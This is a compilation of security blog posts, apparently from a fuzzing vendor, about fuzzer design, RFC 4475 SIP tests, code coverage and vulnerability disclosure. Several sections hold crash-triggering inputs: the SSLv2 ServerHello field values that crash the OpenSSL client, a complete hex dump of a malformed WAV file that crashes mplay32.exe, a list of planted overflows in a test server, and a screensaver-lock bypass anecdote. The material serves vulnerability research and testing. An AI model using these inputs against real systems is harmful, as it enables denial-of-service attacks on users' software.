Fuzzing for RPC vulnerabilities

So Dave Aitel said there are no more RPC vulnerabilities because his fuzzer couldn’t find any new ones. Well, I thought it was just a matter of trying more combinations and I was right.

The point, though, is not who has a longer fuzzer, but that when it comes to security always bet against the person who says something is impossible.

In fact, I made that mistake myself back in the 1990s, claiming Windows can’t be reliably exploited (I can’t find the link to the old ntbugtraq archives – thank god for that). Little did I know how easy writing Windows exploits would become. Now if I can only get a message to my younger self to avoid this embarrassment. And if I do get to talk to my young self I’ll be sure to tell me to skip the 2nd and 3rd matrix movies.


RFC 4475 is not enough

When beSTORM is used to test VoIP products, it’s usually the standard SIP, SDP and RTP fuzzing. But we were recently asked about opinion on RFC 4475, which was an interesting case study. RFC 4475 for those who do not know is an IETF standard whose goal is to give[s] examples of Session Initiation Protocol (SIP) test messages designed to exercise and “torture” a SIP implementation. This is great but as the RFC states, these are just a few examples – to be more specific 49 discrete examples.

These 49 examples claim to check a broad range of problems that a SIP parser may come across, and that it should either ignore, reject it or handle it correctly.These examples try to test more than one malformed, incorrect or problematic field at a time – opening the possibility that one problematic field is preventing others from being processed.

My problem with these 49 cases is that they seem to be very tailored, testing for specific stuff, without testing all the possible variables of that same example. Lets take the Content-Length header. One example checks the resilience to a negative value, another to a large positive, another yet to the value of zero (0).Did you notice what is missing, for example where is the off-by one underflows/overflows?

Another example is the use of IP addresses inside the sample data, a carelessness or a small oversight by the tester might make the whole example invalid and not parser-able by the test subject. It might be discarded by the product making the entire test worthless, but the tester happy for ‘passing’ the test. It’s like passing a final exam by not showing up!
In conclusion, running those 49 examples is not straight forward, in addition once you ran them and passed, can you say you are ok? From experience I can tell you that in many cases, both our customers and open source products we have tested with beSTORM failed the complete fuzzing test while they passed the RFC 4475 – beSTORM simply discovered one or more vulnerabilities in them that simply didn’t fit any of the 49 examples provided inside the RFC 4475 torture examples.

My recommendation? Testing for those 49 examples only tells you that you are compliant with RFC 4475. Only a serious fuzzer will tell you if your product is secure against SIP, SDP or RTP based attacks.


From description to exploit

Every once in awhile I get an opportunity to work on a “known” vulnerability, but with very little or even no available technical details. These known vulnerabilities tend to be “known” just to their finder and to the vendor that fixed the vulnerability. We know they exist because an advisory is published, but not much more than that.
From the point where the vulnerability got fixed, no one (researcher or vendor) has any interest in disclosing the vulnerability details – as it is no longer interesting – leaving security researchers with insufficient information to confirm whether this vulnerability affects anyone else beside the specific vendor – and specific vendor version.

This is the point I reached today, where our team wanted to update a test of our vulnerability scanner to check for the exploitability of a certain vulnerability on a new platform. The version indicated it was vulnerable to the problem but there was no way to confirm it as the vulnerability’s technical description was inadequate, and checking only the version is a sure way for multitude of false positives.
With the little information available:
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

I was determined to discover what was the “unknown vector” and see whether the product I tested was in fact vulnerable or not.

First step was to understand what the SSLv2 exactly is, and how I can get it – well simple enough here, “openssl s_client” is just what I needed – it was a sample SSL client that utilizes the get_server_hello() function.

Then I needed to create an SSLv2 session, this proved to be a bit more difficult as SSLv2 is now considered insecure and most SSL installations disable it – further Firefox no longer allows connecting to those sites that support it… but apparently Apache 2 haven’t given up on it, and you can turn SSLv2 support quite easily through the SSLProtocol definition.

Once that was available, I launched beSTORM’s auto-learn mechanism and made it capture the SSLv2 traffic – a complete session can be quite extensive but I only needed the first packets as they were the one get_server_hello() function looks into – once this was ready I used the pcap export capabilities to load the captured data into Wireshark – and use Wireshark’s existing dissection to mark which fields where what – who was the length of what, what was a flag, etc.

Then I told beSTORM to start listening on incoming traffic and play around with the values, I mainly concentrated on the following ServerHello parameters:

  • Packet Length (total length)
  • Session ID Hit (valid value is either set to 0×01 or set to 0×00)
  • Certificate Type (it is an enumeration of three possible values)
  • Certificate Length
  • Certificate Value
  • Cipher Spec Length
  • Cipher Spec Value
  • Connection ID Length
  • Connection ID Value

After a few thousands of combinations – taking about 50 minutes – with beSTORM modifying the Session ID Hit (set to 0×00), Certificate Type set to NULL (0×00), Certificate Length equal to 0, Certificate Value set to none, Cipher Spec Length equal to 0, Cipher Spec Value set to none and the default captured values of Connection ID – the openssl client crashed:

Program received signal SIGSEGV, Segmentation fault.
0x0808638d in get_server_hello (s=0x81aed90) at s2_clnt.c:542
542 if (s->session->peer != s->session->sess_cert->peer_key->x509)

Now all I needed was to instruct beSTORM to build a module from it – job done.

From a very vague description to an exploit in about an hour :-)

An exploit can be found at:  OpenSSL SSLv2 Client Crash (NULL Reference)


PCM 0day (Divide by Zero)

The debate about the term “zero days” is not directly related to this PCM vulnerability I am about to reveal, but as this vulnerability is not publicly documented, as far as I know, I will call it a 0day.

The vulnerability allows you to crash the mplay32.exe – that for some reason is still shipped with Windows up to version 2003, maybe also Vista, can someone confirm? – this low-quality and feature-lacking (software-wise) player contains a problem where a malformed PCM file can cause it to crash as it tries to divide one number by zero.
00000000 52 49 46 46 24 00 00 1a 57 41 56 45 66 6d 74 20
|RIFF$…WAVEfmt |
00000010 10 00 00 00 01 00 02 00 44 ac 00 00 88 58 01 00
00000020 00 00 10 00 64 61 74 61 00 00 00 1a 00 00 24 17
00000030 1e f3 3c 13 3c 14 16 f9 18 f9 34 e7 23 a6 3c f2
|..< .<.....4.#.<.|
00000040 24 f2 11 ce 1a 0d
Is this vulnerability interesting? not really - mplay32.exe is no longer the default player - unless you are still in the stone-age (i.e. have never upgraded your system or Internet Explorer) - and it allows you to do nothing but crash the player.

If someone can find out more about this issue, I will be happy to hear.

BTW: This PCM vulnerability was discovered by beSTORM’s PCM (WAV) fuzzing module – which was launched against mplay32.exe


Flayer is Google’s step to Web application security testing

Google has introduced the tool recently via its Online Security Blog.

The tool is released under GNU General Public License v2.

The home of the new project is here: code.google.com/p/flayer/

The visitors of WOOT ‘07 conference are aware already.


Vulnerable test application: Simple Web Server (SWS)

every once in a while (last time a few months ago) someone emails one of the mailing lists about searching for an example binary, mostly for:

- reverse engineering for vulnerabilities, as a study tool.
- testing fuzzers

some of these exist, but i asked my employer, beyond security, to release our test application, specific for testing fuzzing (built for the bestorm fuzzer). they agreed to release the http version, following their agreement to release our ani xml specification.

the gui allows you to choose what port your want to run it on, as well as which vulnerabilities should be “active”.

it is called simple web server or sws, and has the following vulnerabilities:

1. off-by-one in content-length (integer overflow/malloc issue)
2. overflow in user-agent
3. overflow in method
4. overflow in uri
5. overflow in host
6. overflow in version
7. overflow in complete packet
8. off by one in receive function (linefeed/carriage return issue)
9. overflow in authorization type
10. overflow in base64 decoded
11. overflow in username of authorization
12. overflow in password of authorization
13. overflow in body
14. cross site scripting

it can be found on beyond security’s website, here:

gadi evron,


Windows screensaver lock and lecturing

i was giving a lecture at nps yesterday, and while i was unlocking my laptop (xp), suddently, before unlocked, a file open window pops up. i could browse, and more importantly, open files. the first choice of the system was .hlp.

can someone say pwnage? anyone up to doing some monkey fuzzing on that interface?

gadi evron,


Mozilla’s JavaScript fuzzer – Opera’s best friend

Window Snyder, the head of security strategy at Mozilla Corporation wrote this week about the Opera’s way to use Mozilla’s fuzzer for JavaScript. Mrs. Snyder is pointing to the post of Claudio Santambrogio from Opera Software:

While running the tool, we found four crashers – one of which might have some security implications.

When we are reading news like this from Microsoft and Apple?


FuzzGuru’s approach to fuzzing

Recently I have seen a lecture by John of Microsoft about their FuzzGuru framework, apparently their approach to fuzzing is through tight integration with code coverage tools, in similar fashion a recently published paper by Microsoft Research, Automated Whitebox Fuzz Testing, shows that this is in fact Microsoft’s approach to fuzzing.
Though this approach seems to provide good results to Microsoft, I am not sure it is a good approach to the majority of people that develop software, as in the security testing phase there is usually little chance that the source code will be available for code coverage testing.

Some would think that binary form code coverage might work as well, I disagree as generic code coverage will make the fuzzer confused as it would not concentrate on the parser part of the program which our fuzzer needs to test.

We’ve been toying with the idea of implementing both source code coverage and binary code coverage in beSTORM but I’m not sure I’m convinced yet that the code coverage approach is beneficial.


.ANI fuzzing module released

after being challenged by Sunshine, we decided to make the bestorm .ani file fuzzing module description available publicly.

this module is interesting because microsoft’s fuzzing team, using a template-based fuzzing module, missed during their testing a vulnerability that turned out to be a zero-day. we built it by simply feeding a few sample files into bestorm and using its autolearn feature to produce a file fuzzing module. the module we produced does catch the 0-day but we welcome any feedback as to how good or bad this module actually is.

the fuzzing module description is available here.


The Future of Fuzzing (from Fuzzing and Code Coverage)

kowsik guruswami sent a message today to dd about using code coverage to help build better fuzzers.

i have many thoughts on this subject. here is my reply email:

on mon, 26 mar 2007, kowsik wrote:
> we just released rcov-0.1, an interactive/incremental code coverage
> tool to assist in building effective fuzzers.
> quick summary:
> – it’s a webrick browser-based application (ruby)
> – uses gcov’s notes/data files to get at blocks and function summaries
> – interactively/incrementally shows the coverage information while fuzzing
> – uses ctags to cross reference functions/prototypes/definitions/macros

hi kowsik, thanks for this.

i have a few notes though, as i believe this can be taken much further (at least my studies so far show that).

we have three levels or layers (depends on approach):
1. building better fuzzers (which you cover).
2. helping the fuzzing process, fuzzing better.
3. making the process of finding the actual vulnerability once an indication is found (a successful test case, or as they say in qa, a passing one) easier.

several folks in the past few months have said that fuzzing isn’t new and has been done for years – that much is true.

some folks also said that fuzzing is as simple as it gets and has no where left to evolve. that is indeed very much false.

code coverage, static analysis, run-time analysis.. etc. all have a place in the future of fuzzing.
i see fuzzers development in coming years as changing the term “dumb fuzzing” to mean today’s protocol-based smart fuzzing, and “smart fuzzing” being about what interactive changes are happening as you fuzz.

the most that we see today (in most cases) is the engine running undisturbed, while the monitor (if such even exists) being a simple debugger.

evolving host and network monitoring to use profiling technologies, map functions and paths, watch for memory issues, etc. is fast coming.

today, changing the action of a fuzzer as it is running is difficult (there is no real driver, just an engine). a simple example for this evolution could be watching for cpu uage. if the cpu usage spikes it could mean:
1. we are sending too many requests per second – we should slow down the engine.
2. (if for the thread itself) we are on to something, we should explore this attack (likely 10000 “attacks” we went through) or adjust to a different fuzzing engine to explore that particular section of the program (as we mapped it – code coverage again).

the two don’t easily work together, not to mention even stopping a fuzzer, rewinding it or god forbid running a different one at the same time (on the same instance anyway).

which brings us to distributed fuzzing… but that’s a whole different subject yet again.

fuzzing has a long way to go, and we didn’t even really start to explore full intergration with static analysis tools (other than with results).

we had a discussion on the fuzzing mailing list recently about genetic fuzzing, but i dam not really a math geek. jared can explain that one better… and so on.

all that before we explore uses for fuzzing outside of the development cycle (mostly security qa) and vulnerability research, which is with client-side testing. perhaps fuzzers will help us force the hand of software vendors to develop more robust and secure code.

working for a fuzzing vendor i am only too familiar with the turing halting problem and seeking reality in the midst of eternal runs, but the most interesting thing i found in the past few months (which wasn’t technical) is the clash of cultures between qa engineers and security professionals. it will be very interesting to see where we end up.



gadi evron,


Generating Test Cases

catchconv: symbolic execution and run-time type inference for integer conversion errors

this is an interesting paper, and it seems like the fuzzing mailing list helped out a tad bit. :)

abstract. we propose an approach that combines symbolic execution and run-time type inference from a sample program run to generate test cases, and we apply our approach to signed/unsigned conversion errors in programs. a signed/unsigned conversion error occurs when a program makes control how decisions about a value based on treating it as a signed integer, but then later converts the value to an unsigned integer in a way that breaks the program’s implicit assumptions. our tool follows the approach of larson and austin in using an example input to pick a program path for analysis [21], and we use symbolic execution to attempt synthesis of a program input exhibiting an error [19, 17, 8, 34]. we describe a proof of concept implementation that uses the valgrind binary analysis framework and the stp decision procedure, and we report on preliminary experiences. our implementation is available at http://www.sf.net/projects/catchconv. keywords: software security, symbolic execution, test generation, decision procedure, dynamic binary analysis

gadi evron,


More CCC Presentations and Videos

other presentations i enjoyed, which i just noticed online:
pdf george danezis, introducing traffic analysis

wmv georg wicherski, automated botnet detection and mitigation

wmv gadi evron, fuzzing in the corporate world (yes, mine)

wmv ilja van sprundel, unusual bugs

pdf ilja van sprundel, unusual bugs

wmv michael steil, inside vmware

more here [mirror]. all mirrors, etc. can be found here. i hope everything becomes available soon.

gadi evron,


Test it (for security holes) before you buy it

Seems like blackbox testing tools (fuzzers) gain more ground, but not in the way I would expect.

I expected software/networking vendors to be buying commercial fuzzers to check their products for security holes (or using open source fuzzing tools as part of the development cycle). Surprisingly, most companies I know that have implemented fuzzers are not the ones writing code, but those who rely on other people’s products – telcos, cell phone providers, financial institutions, and equipment suppliers.

Apparently, some of these companies check 3rd party products for security holes before they install them in their network.

While this ‘certification’ attitude is expected from financial institutions, it’s pleasantly surprising to see it from equipment suppliers, for example. One large telco went as far as informing several networking equipment vendors that any new version of their networking products will undergo extensive security tests before it is purchased. Since the tests are done with a commercial fuzzing product, the networking vendor has a chance to buy a similar product and do its testing already in the development lab – saving the shame of having the customer find its security holes for him.

Perhaps I shouldn’t be too surprised – there were many instances of organizations running nessus on their networking equipment and sending the vendor a ‘report card’ with all the known vulnerabilities present in the product. But doing a quick nessus run is way different from implementing security testing as part of the acceptance process. At least one company picked up on this upcoming trend – BreakingPoint‘s business model is around companies benchmarking security products before deciding which ones to buy. Will this trend tie up with testing products for security holes before deciding which ones to buy?

Another pleasant surprise is that Microsoft, who has been behind in terms of security for many years (to a point where many people, myself included, were convinced that they “just don’t get it”), has implemented a fuzzing infrastructure that is more advanced than anything else I’ve seen. A couple of networking vendors are not too far behind, but the rest of the software development world seems to be in the security testing dark ages.

This is obviously a good step for the security world – if large customers begin to pressure product vendors to develop more secure products (rather than spend marketing dollars on branding themselves as secure), product security will have a clearer ROI and the result will be more secure products.

A cynical friend of mine told me that this is yet another proof that product vendors will not take steps to increase their product’s security unless pushed to do so by external forces. I tend to think that whatever the reasons, a net result of less security holes is good for everyone.


These two weeks of Word flaws – can we survive?

Since 5th December we have seen three separate, serious vulnerabilities in Microsoft Word:

[Disclosed - original reference - CVE name
Affected products and product versions]

Tue 5th Dec – MS Security Advisory #929433CVE-2006-5994 and FAQ
Word 2003/2002/2000, Word 2004/v. X for Mac, Works 2006/2005/2004, Word Viewer 2003

Sat 9th Dec – MSRC Blog entry 10th DecCVE-2006-6456
Word 2003/2002/2000, Word Viewer 2003

Tue 12th Dec – Fuzzing list postingCVE-2006-6561
Word 2003/2002/2000, Word 2004/v. X for Mac, Word Viewer 2003, OpenOffice.org 2/1.1.3, AbiWord 2.2

Related to the third issue new submission to VirusTotal has been done. There is some better results now:

# 12.15.2006 01:04:58 (CET)

AntiVir 14th Dec: EXP/W97M.DuBug
BitDefender 15th Dec: Exploit.MSWord.Gen.2
Fortinet 14th Dec: W32/CVE20065994!exploit (the CVE of 1st issue)
Ikarus 14th Dec: Exploit.MSWord.Gen.2
McAfee 14th Dec: Exploit-MSWord.c.demo
NOD32v2 14th Dec: W97M/Exploit.1Table.NAE
Panda 15th Dec: Trj/1Table.D

Symantec is not listed, but they have released Bloodhound.Exploit.108.


MoKB Wireless Driver Bug – Critical to Windows Systems

the month of kernel bugs (mokb) released an advisory (mokb-11-11-2006) today on a wireless vulnerability in broadcom’s wireless driver.

zert, in cooperation with metasploit, the sans isc and indeed, securiteam, issued an advisory on the issue, explaining why it is critical, etc.:


the advisory was written by h d moore, gadi evron (me) and johannes ullrich.

worth a read, this is serious.


gadi evron,